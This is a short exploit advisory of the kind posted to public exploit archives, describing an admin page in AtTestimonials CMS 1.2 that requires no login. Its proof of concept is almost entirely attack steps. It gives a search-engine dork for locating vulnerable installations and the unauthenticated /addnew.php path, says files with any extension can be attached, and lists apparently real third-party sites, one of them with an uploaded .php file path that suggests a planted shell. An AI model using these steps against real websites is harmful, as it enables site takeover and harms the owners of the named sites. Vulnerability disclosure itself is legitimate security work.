Authored by indoushka

AtTestimonials CMS version 1.2 suffers from a missing authentication vulnerability.

====================================================================================================================================
| # Title : AtTestimonials CMS v1.2 Missing Authentication Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip |
| # Dork : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] appears to be missing authentication on the administrative interface

[+] Use payload : /addnew.php

[+] Add New Testimonials

[+] http://wccpavingcouk/testimonials/addnew.php

[+] Attach any file extension

[+] http://dfwcarfixcom/testimonials/upload/084145ahmad.php


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================